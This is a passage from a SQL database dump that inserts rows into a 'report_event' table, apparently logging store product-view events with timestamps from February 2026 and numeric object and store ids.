(26123, '2026-02-10 17:37:17', 1, 2062, 0, 1, 1),
(26124, '2026-02-10 17:37:47', 1, 2062, 0, 1, 1),
(26125, '2026-02-10 18:57:03', 1, 2060, 0, 1, 1),
(26126, '2026-02-10 18:57:06', 1, 2064, 0, 1, 1),
(26127, '2026-02-10 18:57:08', 1, 2058, 0, 1, 1),
(26128, '2026-02-10 18:57:10', 1, 2059, 0, 1, 1),
(26129, '2026-02-10 18:57:11', 1, 2053, 0, 1, 1),
(26130, '2026-02-10 18:57:13', 1, 2054, 0, 1, 1),
(26131, '2026-02-10 18:57:17', 1, 2055, 0, 1, 1),
(26132, '2026-02-10 19:20:51', 1, 2061, 0, 1, 1),
(26133, '2026-02-10 21:03:20', 1, 2058, 0, 1, 1),
(26134, '2026-02-10 21:25:06', 1, 2064, 0, 1, 1),
(26135, '2026-02-10 21:52:55', 1, 2058, 0, 1, 1),
(26136, '2026-02-10 23:37:28', 1, 2061, 0, 1, 1),
(26137, '2026-02-11 00:59:59', 1, 2061, 0, 1, 1),
(26138, '2026-02-11 01:09:27', 1, 2058, 0, 1, 1),
(26139, '2026-02-11 02:01:19', 1, 2061, 0, 1, 1),
(26140, '2026-02-11 02:29:38', 1, 2058, 0, 1, 1),
(26141, '2026-02-11 02:30:17', 1, 2054, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(26142, '2026-02-11 02:31:14', 1, 2060, 0, 1, 1),
(26143, '2026-02-11 02:31:18', 1, 2060, 0, 1, 1),
(26144, '2026-02-11 02:32:49', 1, 2055, 0, 1, 1),
(26145, '2026-02-11 02:32:59', 1, 2054, 0, 1, 1),
(26146, '2026-02-11 02:33:41', 1, 2058, 0, 1, 1),
(26147, '2026-02-11 03:03:47', 1, 2060, 0, 1, 1),
(26148, '2026-02-11 04:12:11', 1, 2060, 0, 1, 1),
(26149, '2026-02-11 04:49:22', 1, 2061, 0, 1, 1),
(26150, '2026-02-11 04:57:19', 1, 2064, 0, 1, 1),
(26151, '2026-02-11 06:00:54', 1, 2064, 0, 1, 1),
(26152, '2026-02-11 06:05:49', 1, 2060, 0, 1, 1),
(26153, '2026-02-11 06:56:10', 1, 2061, 0, 1, 1),
(26154, '2026-02-11 08:09:44', 1, 2060, 0, 1, 1),
(26155, '2026-02-11 10:55:51', 1, 2055, 0, 1, 1),
(26156, '2026-02-11 11:06:02', 1, 2059, 0, 1, 1),
(26157, '2026-02-11 13:02:33', 1, 2061, 0, 1, 1),
(26158, '2026-02-11 13:52:22', 1, 2064, 0, 1, 1),
(26159, '2026-02-11 14:54:50', 1, 2060, 0, 1, 1),
(26160, '2026-02-11 14:54:53', 1, 2060, 0, 1, 1),
(26161, '2026-02-11 15:26:05', 1, 2060, 0, 1, 1),
(26162, '2026-02-11 15:26:08', 1, 2060, 0, 1, 1),
(26163, '2026-02-11 15:27:15', 1, 2064, 0, 1, 1),
(26164, '2026-02-11 16:12:16', 1, 2061, 0, 1, 1),
(26165, '2026-02-11 16:44:26', 1, 2061, 0, 1, 1),
(26166, '2026-02-11 17:42:33', 1, 2059, 0, 1, 1),
(26167, '2026-02-11 18:37:34', 1, 2061, 0, 1, 1),
(26168, '2026-02-11 19:09:12', 1, 2063, 0, 1, 1),
(26169, '2026-02-11 19:33:12', 1, 2060, 0, 1, 1),
(26170, '2026-02-11 19:51:37', 1, 2062, 0, 1, 1),
(26171, '2026-02-11 20:06:14', 1, 2060, 0, 1, 1),
(26172, '2026-02-11 20:11:19', 1, 2060, 0, 1, 1),
(26173, '2026-02-11 20:44:54', 1, 2060, 0, 1, 1),
(26174, '2026-02-11 21:41:02', 1, 2064, 0, 1, 1),
(26175, '2026-02-11 22:28:41', 1, 2054, 0, 1, 1),
(26176, '2026-02-11 22:29:05', 1, 2060, 0, 1, 1),
(26177, '2026-02-11 22:30:11', 1, 2058, 0, 1, 1),
(26178, '2026-02-11 22:30:40', 1, 2054, 0, 1, 1),
(26179, '2026-02-11 22:30:45', 1, 2060, 0, 1, 1),
(26180, '2026-02-11 22:31:52', 1, 2055, 0, 1, 1),
(26181, '2026-02-11 23:22:24', 1, 2059, 0, 1, 1),
(26182, '2026-02-11 23:29:34', 1, 2061, 0, 1, 1),
(26183, '2026-02-12 00:10:31', 1, 2064, 0, 1, 1),
(26184, '2026-02-12 00:14:42', 1, 2063, 0, 1, 1),
(26185, '2026-02-12 02:29:31', 1, 2060, 0, 1, 1),
(26186, '2026-02-12 03:04:02', 1, 2060, 0, 1, 1),
(26187, '2026-02-12 04:52:49', 1, 2062, 0, 1, 1),
(26188, '2026-02-12 05:10:08', 1, 2064, 0, 1, 1),
(26189, '2026-02-12 05:11:49', 1, 2059, 0, 1, 1),
(26190, '2026-02-12 05:11:58', 1, 2054, 0, 1, 1),
(26191, '2026-02-12 05:14:05', 1, 2060, 0, 1, 1),
(26192, '2026-02-12 05:15:08', 1, 2055, 0, 1, 1),
(26193, '2026-02-12 05:16:37', 1, 2058, 0, 1, 1),
(26194, '2026-02-12 05:21:35', 1, 2063, 0, 1, 1),
(26195, '2026-02-12 05:29:26', 1, 2064, 0, 1, 1),
(26196, '2026-02-12 05:35:13', 1, 2062, 0, 1, 1),
(26197, '2026-02-12 05:56:49', 1, 2061, 0, 1, 1),
(26198, '2026-02-12 06:23:25', 1, 2053, 0, 1, 1),
(26199, '2026-02-12 07:09:38', 1, 2055, 0, 1, 1),
(26200, '2026-02-12 07:25:45', 1, 2063, 0, 1, 1),
(26201, '2026-02-12 08:32:09', 1, 2060, 0, 1, 1),
(26202, '2026-02-12 09:04:22', 1, 2061, 0, 1, 1),
(26203, '2026-02-12 09:13:37', 1, 2064, 0, 1, 1),
(26204, '2026-02-12 12:28:50', 1, 2064, 0, 1, 1),
(26205, '2026-02-12 13:47:26', 1, 2061, 0, 1, 1),
(26206, '2026-02-12 14:21:53', 1, 2061, 0, 1, 1),
(26207, '2026-02-12 14:25:37', 1, 2062, 0, 1, 1),
(26208, '2026-02-12 14:26:02', 1, 2062, 0, 1, 1),
(26209, '2026-02-12 17:37:52', 1, 2063, 0, 1, 1),
(26210, '2026-02-12 17:53:53', 1, 2062, 0, 1, 1),
(26211, '2026-02-12 17:54:16', 1, 2062, 0, 1, 1),
(26212, '2026-02-12 18:17:20', 1, 2064, 0, 1, 1),
(26213, '2026-02-12 18:30:32', 1, 2060, 0, 1, 1),
(26214, '2026-02-12 18:33:34', 1, 2054, 0, 1, 1),
(26215, '2026-02-12 18:33:35', 1, 2060, 0, 1, 1),
(26216, '2026-02-12 18:35:35', 1, 2058, 0, 1, 1),
(26217, '2026-02-12 18:39:21', 1, 2055, 0, 1, 1),
(26218, '2026-02-12 18:42:33', 1, 2054, 0, 1, 1),
(26219, '2026-02-12 18:55:04', 1, 2064, 0, 1, 1),
(26220, '2026-02-12 19:05:50', 1, 2058, 0, 1, 1),
(26221, '2026-02-12 21:06:47', 1, 2060, 0, 1, 1),
(26222, '2026-02-12 22:52:21', 1, 2062, 0, 1, 1),
(26223, '2026-02-12 22:52:28', 1, 2061, 0, 1, 1),
(26224, '2026-02-12 22:52:32', 1, 2063, 0, 1, 1),
(26225, '2026-02-12 23:46:14', 1, 2064, 0, 1, 1),
(26226, '2026-02-12 23:48:43', 1, 2055, 0, 1, 1),
(26227, '2026-02-13 01:43:04', 1, 2060, 0, 1, 1),
(26228, '2026-02-13 03:03:35', 1, 2064, 0, 1, 1),
(26229, '2026-02-13 05:35:39', 1, 2064, 0, 1, 1),
(26230, '2026-02-13 08:16:52', 1, 2054, 0, 1, 1),
(26231, '2026-02-13 08:26:45', 1, 2061, 0, 1, 1),
(26232, '2026-02-13 08:45:12', 1, 2053, 0, 1, 1),
(26233, '2026-02-13 08:45:21', 1, 2058, 0, 1, 1),
(26234, '2026-02-13 09:04:14', 1, 2063, 0, 1, 1),
(26235, '2026-02-13 09:58:54', 1, 2054, 0, 1, 1),
(26236, '2026-02-13 10:48:07', 1, 2060, 0, 1, 1),
(26237, '2026-02-13 11:22:23', 1, 2061, 0, 1, 1),
(26238, '2026-02-13 11:42:18', 1, 2055, 0, 1, 1),
(26239, '2026-02-13 14:28:35', 1, 2061, 0, 1, 1),
(26240, '2026-02-13 14:29:53', 1, 2060, 0, 1, 1),
(26241, '2026-02-13 14:30:26', 1, 2055, 0, 1, 1),
(26242, '2026-02-13 14:30:31', 1, 2058, 0, 1, 1),
(26243, '2026-02-13 14:30:33', 1, 2054, 0, 1, 1),
(26244, '2026-02-13 14:30:47', 1, 2055, 0, 1, 1),
(26245, '2026-02-13 14:31:57', 1, 2053, 0, 1, 1),
(26246, '2026-02-13 14:32:01', 1, 2060, 0, 1, 1),
(26247, '2026-02-13 14:32:19', 1, 2060, 0, 1, 1),
(26248, '2026-02-13 16:14:40', 1, 2060, 0, 1, 1),
(26249, '2026-02-13 16:14:44', 1, 2060, 0, 1, 1),
(26250, '2026-02-13 16:42:23', 1, 2060, 0, 1, 1),
(26251, '2026-02-13 16:42:26', 1, 2060, 0, 1, 1),
(26252, '2026-02-13 18:40:00', 1, 2060, 0, 1, 1),
(26253, '2026-02-13 19:07:18', 1, 2053, 0, 1, 1),
(26254, '2026-02-13 19:18:52', 1, 2064, 0, 1, 1),
(26255, '2026-02-13 20:08:50', 1, 2059, 0, 1, 1),
(26256, '2026-02-13 22:25:05', 1, 2064, 0, 1, 1),
(26257, '2026-02-13 22:38:36', 1, 2063, 0, 1, 1),
(26258, '2026-02-13 22:55:52', 1, 2058, 0, 1, 1),
(26259, '2026-02-13 23:36:00', 1, 2063, 0, 1, 1),
(26260, '2026-02-14 00:44:46', 1, 2061, 0, 1, 1),
(26261, '2026-02-14 00:46:39', 1, 2064, 0, 1, 1),
(26262, '2026-02-14 01:31:03', 1, 2061, 0, 1, 1),
(26263, '2026-02-14 01:51:40', 1, 2063, 0, 1, 1),
(26264, '2026-02-14 02:23:19', 1, 2053, 0, 1, 1),
(26265, '2026-02-14 03:56:47', 1, 2060, 0, 1, 1),
(26266, '2026-02-14 06:46:04', 1, 2060, 0, 1, 1),
(26267, '2026-02-14 06:46:07', 1, 2059, 0, 1, 1),
(26268, '2026-02-14 09:00:47', 1, 2063, 0, 1, 1),
(26269, '2026-02-14 10:14:12', 1, 2061, 0, 1, 1),
(26270, '2026-02-14 10:30:23', 1, 2060, 0, 1, 1),
(26271, '2026-02-14 10:30:25', 1, 2055, 0, 1, 1),
(26272, '2026-02-14 10:31:05', 1, 2054, 0, 1, 1),
(26273, '2026-02-14 10:33:26', 1, 2058, 0, 1, 1),
(26274, '2026-02-14 10:34:51', 1, 2060, 0, 1, 1),
(26275, '2026-02-14 12:02:07', 1, 2058, 0, 1, 1),
(26276, '2026-02-14 12:02:10', 1, 2061, 0, 1, 1),
(26277, '2026-02-14 12:02:11', 1, 2059, 0, 1, 1),
(26278, '2026-02-14 12:02:12', 1, 2054, 0, 1, 1),
(26279, '2026-02-14 12:02:13', 1, 2063, 0, 1, 1),
(26280, '2026-02-14 12:02:14', 1, 2062, 0, 1, 1),
(26281, '2026-02-14 12:02:15', 1, 2055, 0, 1, 1),
(26282, '2026-02-14 12:02:17', 1, 2064, 0, 1, 1),
(26283, '2026-02-14 12:02:21', 1, 2060, 0, 1, 1),
(26284, '2026-02-14 12:02:25', 1, 2053, 0, 1, 1),
(26285, '2026-02-14 12:11:16', 1, 2060, 0, 1, 1),
(26286, '2026-02-14 14:36:37', 1, 2060, 0, 1, 1),
(26287, '2026-02-14 16:40:07', 1, 2054, 0, 1, 1),
(26288, '2026-02-14 16:45:01', 1, 2061, 0, 1, 1),
(26289, '2026-02-14 16:53:48', 1, 2058, 0, 1, 1),
(26290, '2026-02-14 16:57:58', 1, 2062, 0, 1, 1),
(26291, '2026-02-14 16:58:35', 1, 2062, 0, 1, 1),
(26292, '2026-02-14 17:04:16', 1, 2055, 0, 1, 1),
(26293, '2026-02-14 17:14:12', 1, 2054, 0, 1, 1),
(26294, '2026-02-14 17:30:49', 1, 2059, 0, 1, 1),
(26295, '2026-02-14 17:34:34', 1, 2064, 0, 1, 1),
(26296, '2026-02-14 18:02:18', 1, 2062, 0, 1, 1),
(26297, '2026-02-14 18:02:44', 1, 2062, 0, 1, 1),
(26298, '2026-02-14 18:21:12', 1, 2053, 0, 1, 1),
(26299, '2026-02-14 19:15:06', 1, 2053, 0, 1, 1),
(26300, '2026-02-14 20:02:09', 1, 2061, 0, 1, 1),
(26301, '2026-02-14 20:26:36', 1, 2061, 0, 1, 1),
(26302, '2026-02-14 21:46:24', 1, 2059, 0, 1, 1),
(26303, '2026-02-15 00:09:02', 1, 2059, 0, 1, 1),
(26304, '2026-02-15 00:26:34', 1, 2062, 0, 1, 1),
(26305, '2026-02-15 01:25:16', 1, 2062, 0, 1, 1),
(26306, '2026-02-15 02:35:02', 1, 2054, 0, 1, 1),
(26307, '2026-02-15 03:46:35', 1, 2059, 0, 1, 1),
(26308, '2026-02-15 06:32:04', 1, 2054, 0, 1, 1),
(26309, '2026-02-15 06:32:52', 1, 2058, 0, 1, 1),
(26310, '2026-02-15 06:32:53', 1, 2055, 0, 1, 1),
(26311, '2026-02-15 06:35:13', 1, 2060, 0, 1, 1),
(26312, '2026-02-15 06:36:13', 1, 2060, 0, 1, 1),
(26313, '2026-02-15 07:05:30', 1, 2062, 0, 1, 1),
(26314, '2026-02-15 07:16:05', 1, 2054, 0, 1, 1),
(26315, '2026-02-15 07:25:44', 1, 2064, 0, 1, 1),
(26316, '2026-02-15 07:32:09', 1, 2061, 0, 1, 1),
(26317, '2026-02-15 07:35:47', 1, 2060, 0, 1, 1),
(26318, '2026-02-15 08:05:18', 1, 2062, 0, 1, 1),
(26319, '2026-02-15 09:18:52', 1, 2053, 0, 1, 1),
(26320, '2026-02-15 12:46:19', 1, 2053, 0, 1, 1),
(26321, '2026-02-15 12:59:44', 1, 2058, 0, 1, 1),
(26322, '2026-02-15 13:02:35', 1, 2059, 0, 1, 1),
(26323, '2026-02-15 13:12:51', 1, 2055, 0, 1, 1),
(26324, '2026-02-15 14:04:00', 1, 2060, 0, 1, 1),
(26325, '2026-02-15 15:05:52', 1, 2060, 0, 1, 1),
(26326, '2026-02-15 15:14:53', 1, 2061, 0, 1, 1),
(26327, '2026-02-15 15:16:48', 1, 2053, 0, 1, 1),
(26328, '2026-02-15 16:45:25', 1, 2063, 0, 1, 1),
(26329, '2026-02-15 17:21:07', 1, 2062, 0, 1, 1),
(26330, '2026-02-15 17:21:27', 1, 2062, 0, 1, 1),
(26331, '2026-02-15 17:24:38', 1, 2060, 0, 1, 1),
(26332, '2026-02-15 17:24:41', 1, 2060, 0, 1, 1),
(26333, '2026-02-15 17:44:36', 1, 2061, 0, 1, 1),
(26334, '2026-02-15 17:57:57', 1, 2060, 0, 1, 1),
(26335, '2026-02-15 17:58:00', 1, 2060, 0, 1, 1),
(26336, '2026-02-15 18:20:03', 1, 2063, 0, 1, 1),
(26337, '2026-02-15 18:30:20', 1, 2061, 0, 1, 1),
(26338, '2026-02-15 18:39:44', 1, 2064, 0, 1, 1),
(26339, '2026-02-15 18:50:15', 1, 2058, 0, 1, 1),
(26340, '2026-02-15 19:12:58', 1, 2054, 0, 1, 1),
(26341, '2026-02-15 19:32:32', 1, 2062, 0, 1, 1),
(26342, '2026-02-15 20:51:19', 1, 2061, 0, 1, 1),
(26343, '2026-02-16 00:55:40', 1, 2060, 0, 1, 1),
(26344, '2026-02-16 01:34:15', 1, 2062, 0, 1, 1),
(26345, '2026-02-16 02:33:00', 1, 2058, 0, 1, 1),
(26346, '2026-02-16 02:34:01', 1, 2054, 0, 1, 1),
(26347, '2026-02-16 02:35:32', 1, 2060, 0, 1, 1),
(26348, '2026-02-16 02:35:36', 1, 2055, 0, 1, 1),
(26349, '2026-02-16 02:38:06', 1, 2060, 0, 1, 1),
(26350, '2026-02-16 02:57:56', 1, 2063, 0, 1, 1),
(26351, '2026-02-16 03:34:55', 1, 2062, 0, 1, 1),
(26352, '2026-02-16 03:36:24', 1, 2064, 0, 1, 1),
(26353, '2026-02-16 03:48:53', 1, 2053, 0, 1, 1),
(26354, '2026-02-16 03:50:34', 1, 2060, 0, 1, 1),
(26355, '2026-02-16 05:17:22', 1, 2064, 0, 1, 1),
(26356, '2026-02-16 05:17:22', 1, 2064, 0, 1, 1),
(26357, '2026-02-16 05:17:22', 1, 2064, 0, 1, 1),
(26358, '2026-02-16 05:17:23', 1, 2063, 0, 1, 1),
(26359, '2026-02-16 05:17:24', 1, 2061, 0, 1, 1),
(26360, '2026-02-16 05:17:24', 1, 2062, 0, 1, 1),
(26361, '2026-02-16 05:17:24', 1, 2059, 0, 1, 1),
(26362, '2026-02-16 05:17:24', 1, 2060, 0, 1, 1),
(26363, '2026-02-16 05:17:26', 1, 2058, 0, 1, 1),
(26364, '2026-02-16 05:17:26', 1, 2055, 0, 1, 1),
(26365, '2026-02-16 05:17:27', 1, 2063, 0, 1, 1),
(26366, '2026-02-16 05:17:27', 1, 2062, 0, 1, 1),
(26367, '2026-02-16 05:17:27', 1, 2060, 0, 1, 1),
(26368, '2026-02-16 05:17:27', 1, 2061, 0, 1, 1),
(26369, '2026-02-16 05:17:27', 1, 2059, 0, 1, 1),
(26370, '2026-02-16 05:17:28', 1, 2063, 0, 1, 1),
(26371, '2026-02-16 05:17:28', 1, 2062, 0, 1, 1),
(26372, '2026-02-16 05:17:28', 1, 2058, 0, 1, 1),
(26373, '2026-02-16 05:17:29', 1, 2055, 0, 1, 1),
(26374, '2026-02-16 05:17:29', 1, 2061, 0, 1, 1),
(26375, '2026-02-16 05:17:30', 1, 2059, 0, 1, 1),
(26376, '2026-02-16 05:17:30', 1, 2060, 0, 1, 1),
(26377, '2026-02-16 05:17:30', 1, 2058, 0, 1, 1),
(26378, '2026-02-16 05:17:31', 1, 2055, 0, 1, 1),
(26379, '2026-02-16 05:17:32', 1, 2063, 0, 1, 1),
(26380, '2026-02-16 05:17:32', 1, 2061, 0, 1, 1),
(26381, '2026-02-16 05:17:32', 1, 2062, 0, 1, 1),
(26382, '2026-02-16 05:17:32', 1, 2059, 0, 1, 1),
(26383, '2026-02-16 05:17:33', 1, 2060, 0, 1, 1),
(26384, '2026-02-16 05:17:33', 1, 2054, 0, 1, 1),
(26385, '2026-02-16 05:17:34', 1, 2061, 0, 1, 1),
(26386, '2026-02-16 05:17:34', 1, 2063, 0, 1, 1),
(26387, '2026-02-16 05:17:34', 1, 2062, 0, 1, 1),
(26388, '2026-02-16 05:17:34', 1, 2055, 0, 1, 1),
(26389, '2026-02-16 05:17:35', 1, 2058, 0, 1, 1),
(26390, '2026-02-16 05:17:35', 1, 2059, 0, 1, 1),
(26391, '2026-02-16 05:17:35', 1, 2060, 0, 1, 1),
(26392, '2026-02-16 05:17:36', 1, 2055, 0, 1, 1),
(26393, '2026-02-16 05:17:36', 1, 2058, 0, 1, 1),
(26394, '2026-02-16 05:17:37', 1, 2063, 0, 1, 1),
(26395, '2026-02-16 05:17:37', 1, 2062, 0, 1, 1),
(26396, '2026-02-16 05:17:38', 1, 2059, 0, 1, 1),
(26397, '2026-02-16 05:17:38', 1, 2054, 0, 1, 1),
(26398, '2026-02-16 05:17:38', 1, 2061, 0, 1, 1),
(26399, '2026-02-16 05:17:38', 1, 2060, 0, 1, 1),
(26400, '2026-02-16 05:17:38', 1, 2054, 0, 1, 1),
(26401, '2026-02-16 05:17:39', 1, 2058, 0, 1, 1),
(26402, '2026-02-16 05:17:40', 1, 2055, 0, 1, 1),
(26403, '2026-02-16 05:17:40', 1, 2054, 0, 1, 1),
(26404, '2026-02-16 05:19:21', 1, 2063, 0, 1, 1),
(26405, '2026-02-16 05:19:21', 1, 2064, 0, 1, 1),
(26406, '2026-02-16 05:19:22', 1, 2064, 0, 1, 1),
(26407, '2026-02-16 05:19:22', 1, 2064, 0, 1, 1),
(26408, '2026-02-16 05:19:22', 1, 2061, 0, 1, 1),
(26409, '2026-02-16 05:19:22', 1, 2062, 0, 1, 1),
(26410, '2026-02-16 05:19:22', 1, 2060, 0, 1, 1),
(26411, '2026-02-16 05:19:22', 1, 2059, 0, 1, 1),
(26412, '2026-02-16 05:19:23', 1, 2058, 0, 1, 1),
(26413, '2026-02-16 05:19:24', 1, 2055, 0, 1, 1),
(26414, '2026-02-16 05:19:25', 1, 2054, 0, 1, 1),
(26415, '2026-02-16 05:19:27', 1, 2055, 0, 1, 1),
(26416, '2026-02-16 05:19:27', 1, 2054, 0, 1, 1),
(26417, '2026-02-16 05:19:28', 1, 2055, 0, 1, 1),
(26418, '2026-02-16 05:19:29', 1, 2054, 0, 1, 1),
(26419, '2026-02-16 05:32:34', 1, 2053, 0, 1, 1),
(26420, '2026-02-16 09:11:39', 1, 2058, 0, 1, 1),
(26421, '2026-02-16 14:21:42', 1, 2064, 0, 1, 1),
(26422, '2026-02-16 14:23:43', 1, 2060, 0, 1, 1),
(26423, '2026-02-16 14:37:03', 1, 2060, 0, 1, 1),
(26424, '2026-02-16 14:43:59', 1, 2053, 0, 1, 1),
(26425, '2026-02-16 15:05:25', 1, 2061, 0, 1, 1),
(26426, '2026-02-16 15:47:11', 1, 2060, 0, 1, 1),
(26427, '2026-02-16 15:54:56', 1, 2053, 0, 1, 1),
(26428, '2026-02-16 16:29:25', 1, 2061, 0, 1, 1),
(26429, '2026-02-16 18:48:00', 1, 2062, 0, 1, 1),
(26430, '2026-02-16 18:48:01', 1, 2053, 0, 1, 1),
(26431, '2026-02-16 19:40:20', 1, 2054, 0, 1, 1),
(26432, '2026-02-16 19:40:27', 1, 2058, 0, 1, 1),
(26433, '2026-02-16 20:39:16', 1, 2064, 0, 1, 1),
(26434, '2026-02-16 22:32:52', 1, 2058, 0, 1, 1),
(26435, '2026-02-16 22:33:13', 1, 2055, 0, 1, 1),
(26436, '2026-02-16 22:33:56', 1, 2060, 0, 1, 1),
(26437, '2026-02-16 22:34:33', 1, 2064, 0, 1, 1),
(26438, '2026-02-16 22:35:29', 1, 2063, 0, 1, 1),
(26439, '2026-02-16 22:37:05', 1, 2054, 0, 1, 1),
(26440, '2026-02-16 22:37:14', 1, 2060, 0, 1, 1),
(26441, '2026-02-16 23:09:24', 1, 2060, 0, 1, 1),
(26442, '2026-02-16 23:51:57', 1, 2061, 0, 1, 1),
(26443, '2026-02-17 02:42:40', 1, 2061, 0, 1, 1),
(26444, '2026-02-17 04:53:24', 1, 2053, 0, 1, 1),
(26445, '2026-02-17 05:23:24', 1, 2060, 0, 1, 1),
(26446, '2026-02-17 11:21:08', 1, 2053, 0, 1, 1),
(26447, '2026-02-17 13:24:36', 1, 2059, 0, 1, 1),
(26448, '2026-02-17 13:42:37', 1, 2060, 0, 1, 1),
(26449, '2026-02-17 14:30:43', 1, 2061, 0, 1, 1),
(26450, '2026-02-17 14:40:01', 1, 2061, 0, 1, 1),
(26451, '2026-02-17 15:18:16', 1, 2064, 0, 1, 1),
(26452, '2026-02-17 15:19:48', 1, 2064, 0, 1, 1),
(26453, '2026-02-17 15:30:56', 1, 2064, 0, 1, 1),
(26454, '2026-02-17 15:34:52', 1, 2064, 0, 1, 1),
(26455, '2026-02-17 15:40:49', 1, 2064, 0, 1, 1),
(26456, '2026-02-17 15:42:31', 1, 2059, 0, 1, 1),
(26457, '2026-02-17 16:13:15', 1, 2060, 0, 1, 1),
(26458, '2026-02-17 16:36:03', 1, 2060, 0, 1, 1),
(26459, '2026-02-17 16:36:06', 1, 2060, 0, 1, 1),
(26460, '2026-02-17 17:02:12', 1, 2060, 0, 1, 1),
(26461, '2026-02-17 17:02:15', 1, 2060, 0, 1, 1),
(26462, '2026-02-17 17:13:18', 1, 2062, 0, 1, 1),
(26463, '2026-02-17 17:13:46', 1, 2062, 0, 1, 1),
(26464, '2026-02-17 18:35:13', 1, 2060, 0, 1, 1),
(26465, '2026-02-17 18:35:13', 1, 2055, 0, 1, 1),
(26466, '2026-02-17 18:39:25', 1, 2058, 0, 1, 1),
(26467, '2026-02-17 18:39:34', 1, 2054, 0, 1, 1),
(26468, '2026-02-17 18:47:29', 1, 2060, 0, 1, 1),
(26469, '2026-02-17 19:38:36', 1, 2053, 0, 1, 1),
(26470, '2026-02-17 20:00:47', 1, 2053, 0, 1, 1),
(26471, '2026-02-17 20:53:40', 1, 2061, 0, 1, 1),
(26472, '2026-02-17 21:42:13', 1, 2060, 0, 1, 1),
(26473, '2026-02-17 22:13:46', 1, 2055, 0, 1, 1),
(26474, '2026-02-17 22:14:56', 1, 2059, 0, 1, 1),
(26475, '2026-02-17 22:18:53', 1, 2060, 0, 1, 1),
(26476, '2026-02-17 23:36:43', 1, 2054, 0, 1, 1),
(26477, '2026-02-18 00:19:20', 1, 2060, 0, 1, 1),
(26478, '2026-02-18 00:35:46', 1, 2055, 0, 1, 1),
(26479, '2026-02-18 01:00:58', 1, 2053, 0, 1, 1),
(26480, '2026-02-18 02:07:20', 1, 2060, 0, 1, 1),
(26481, '2026-02-18 03:09:04', 1, 2055, 0, 1, 1),
(26482, '2026-02-18 05:57:26', 1, 2064, 0, 1, 1),
(26483, '2026-02-18 07:45:58', 1, 2064, 0, 1, 1),
(26484, '2026-02-18 08:33:44', 1, 2058, 0, 1, 1),
(26485, '2026-02-18 09:43:26', 1, 2061, 0, 1, 1),
(26486, '2026-02-18 09:46:37', 1, 2061, 0, 1, 1),
(26487, '2026-02-18 10:34:17', 1, 2062, 0, 1, 1),
(26488, '2026-02-18 12:46:59', 1, 2062, 0, 1, 1),
(26489, '2026-02-18 14:34:54', 1, 2058, 0, 1, 1),
(26490, '2026-02-18 14:36:12', 1, 2060, 0, 1, 1),
(26491, '2026-02-18 14:36:40', 1, 2055, 0, 1, 1),
(26492, '2026-02-18 14:36:41', 1, 2054, 0, 1, 1),
(26493, '2026-02-18 14:38:27', 1, 2060, 0, 1, 1),
(26494, '2026-02-18 14:56:36', 1, 2063, 0, 1, 1),
(26495, '2026-02-18 14:56:40', 1, 2061, 0, 1, 1),
(26496, '2026-02-18 14:56:45', 1, 2059, 0, 1, 1),
(26497, '2026-02-18 14:56:50', 1, 2058, 0, 1, 1),
(26498, '2026-02-18 14:56:54', 1, 2055, 0, 1, 1),
(26499, '2026-02-18 14:56:59', 1, 2054, 0, 1, 1),
(26500, '2026-02-18 14:57:03', 1, 2060, 0, 1, 1),
(26501, '2026-02-18 15:27:38', 1, 2060, 0, 1, 1),
(26502, '2026-02-18 15:45:01', 1, 2053, 0, 1, 1),
(26503, '2026-02-18 16:21:29', 1, 2062, 0, 1, 1),
(26504, '2026-02-18 16:21:44', 1, 2062, 0, 1, 1),
(26505, '2026-02-18 17:50:55', 1, 2059, 0, 1, 1),
(26506, '2026-02-18 18:00:43', 1, 2061, 0, 1, 1),
(26507, '2026-02-18 18:34:10', 1, 2060, 0, 1, 1),
(26508, '2026-02-18 19:22:53', 1, 2054, 0, 1, 1),
(26509, '2026-02-18 19:23:13', 1, 2062, 0, 1, 1),
(26510, '2026-02-18 19:24:32', 1, 2064, 0, 1, 1),
(26511, '2026-02-18 19:26:39', 1, 2055, 0, 1, 1),
(26512, '2026-02-18 19:30:07', 1, 2059, 0, 1, 1),
(26513, '2026-02-18 19:30:15', 1, 2063, 0, 1, 1),
(26514, '2026-02-18 19:34:36', 1, 2060, 0, 1, 1),
(26515, '2026-02-18 19:44:38', 1, 2058, 0, 1, 1),
(26516, '2026-02-18 19:51:22', 1, 2061, 0, 1, 1),
(26517, '2026-02-18 20:00:48', 1, 2053, 0, 1, 1),
(26518, '2026-02-18 20:20:43', 1, 2061, 0, 1, 1),
(26519, '2026-02-18 20:34:10', 1, 2060, 0, 1, 1),
(26520, '2026-02-18 21:17:27', 1, 2055, 0, 1, 1),
(26521, '2026-02-18 21:54:17', 1, 2060, 0, 1, 1),
(26522, '2026-02-18 21:59:43', 1, 2053, 0, 1, 1),
(26523, '2026-02-19 04:19:52', 1, 2064, 0, 1, 1),
(26524, '2026-02-19 04:20:19', 1, 2064, 0, 1, 1),
(26525, '2026-02-19 04:21:34', 1, 2064, 0, 1, 1),
(26526, '2026-02-19 04:50:03', 1, 2064, 0, 1, 1),
(26527, '2026-02-19 05:18:56', 1, 2053, 0, 1, 1),
(26528, '2026-02-19 05:35:39', 1, 2058, 0, 1, 1),
(26529, '2026-02-19 05:35:48', 1, 2055, 0, 1, 1),
(26530, '2026-02-19 05:36:25', 1, 2055, 0, 1, 1),
(26531, '2026-02-19 05:37:11', 1, 2058, 0, 1, 1),
(26532, '2026-02-19 05:37:20', 1, 2055, 0, 1, 1),
(26533, '2026-02-19 05:37:39', 4, 2058, 0, 1, 1),
(26534, '2026-02-19 05:38:07', 1, 2055, 0, 1, 1),
(26535, '2026-02-19 06:20:01', 1, 2053, 0, 1, 1),
(26536, '2026-02-19 07:58:24', 1, 2060, 0, 1, 1),
(26537, '2026-02-19 08:50:25', 1, 2061, 0, 1, 1),
(26538, '2026-02-19 10:36:07', 1, 2054, 0, 1, 1),
(26539, '2026-02-19 10:36:37', 1, 2060, 0, 1, 1),
(26540, '2026-02-19 10:38:32', 1, 2060, 0, 1, 1),
(26541, '2026-02-19 10:39:23', 1, 2062, 0, 1, 1),
(26542, '2026-02-19 10:40:13', 1, 2058, 0, 1, 1),
(26543, '2026-02-19 10:57:45', 1, 2060, 0, 1, 1),
(26544, '2026-02-19 13:24:58', 1, 2054, 0, 1, 1),
(26545, '2026-02-19 15:00:45', 1, 2053, 0, 1, 1),
(26546, '2026-02-19 15:58:28', 1, 2061, 0, 1, 1),
(26547, '2026-02-19 16:06:02', 1, 2060, 0, 1, 1),
(26548, '2026-02-19 16:06:08', 1, 2060, 0, 1, 1),
